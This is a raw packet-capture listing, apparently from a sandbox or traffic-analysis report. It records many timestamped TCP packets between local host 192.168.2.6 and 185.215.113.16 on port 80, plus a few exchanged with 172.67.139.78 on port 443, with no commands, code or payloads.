                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.367302895 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.367321968 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.367340088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.367340088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.367362022 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.412508965 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.412569046 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.483975887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.483998060 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484019041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484052896 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484071016 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484097958 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484110117 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484121084 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484132051 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484144926 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484164000 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484189987 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484500885 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484533072 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484548092 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484554052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484570980 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484571934 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484582901 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484590054 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484602928 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484606981 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484615088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484621048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484642029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.484659910 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485327005 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485416889 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485430002 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485440969 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485455990 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485465050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485469103 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485481024 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485492945 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485497952 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485517979 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.485526085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486258984 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486274004 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486305952 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486314058 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486325979 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486325979 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486339092 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486350060 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486352921 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486360073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486366034 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486372948 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486393929 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.486412048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487215996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487229109 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487238884 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487257957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487271070 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487282991 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487297058 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487310886 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487339020 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.487350941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488025904 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488037109 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488070011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488089085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488265991 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488358974 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488370895 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488383055 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488394976 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488401890 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488404989 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488416910 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488429070 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488430023 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488451004 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.488473892 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489255905 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489268064 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489278078 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489290953 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489298105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489301920 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489314079 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489326000 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489331007 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489342928 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.489362001 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490160942 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490171909 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490183115 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490195036 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490206957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490219116 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490235090 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490241051 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490246058 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490284920 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.490302086 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491333008 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491348982 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491359949 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491373062 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491384029 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491393089 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491394997 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491405964 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491416931 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491424084 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.491457939 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492058992 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492072105 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492083073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492095947 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492105961 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492106915 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492119074 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492120028 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492130041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492157936 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492172003 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492964983 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492978096 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492986917 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.492996931 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.493010044 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.493021965 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.493026972 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.493032932 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.493036032 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.493077993 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494230032 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494241953 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494251966 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494263887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494263887 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494276047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494287968 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494297981 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494303942 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494309902 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494323015 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494333982 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494337082 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494347095 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494364977 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494383097 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.494407892 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495035887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495048046 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495059967 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495071888 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495090961 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495105028 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495109081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495119095 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495129108 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495140076 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495152950 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495157003 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495162964 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495193958 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495214939 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495640039 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495704889 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495826960 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495852947 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495866060 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495873928 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495893002 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495908022 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495924950 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495937109 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495949030 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495961905 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495973110 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.495990992 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.496840954 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.496896982 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.496954918 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.496965885 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497008085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497756958 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497767925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497778893 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497791052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497801065 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497808933 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497817039 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497829914 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497858047 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.497868061 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498528957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498541117 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498570919 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498589039 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498616934 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498629093 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498640060 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498660088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498661041 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498671055 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498683929 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498687029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498713970 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.498738050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499558926 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499572039 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499583006 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499596119 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499598980 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499618053 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499636889 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499821901 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499840975 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499856949 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499861956 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499883890 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499886036 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499890089 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499897957 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499908924 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499919891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499933004 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.499954939 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500813007 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500825882 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500838041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500850916 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500860929 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500873089 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500874996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500885010 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500897884 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500905037 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500916004 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.500940084 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501600981 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501661062 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501702070 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501714945 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501725912 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501737118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501748085 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501759052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501770973 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501784086 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501801014 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.501825094 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502630949 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502644062 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502655029 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502667904 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502679110 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502685070 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502691031 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502700090 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502701998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502715111 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502737999 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.502758980 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503388882 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503478050 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503480911 CET8049898185.215.113.16192.168.2.6
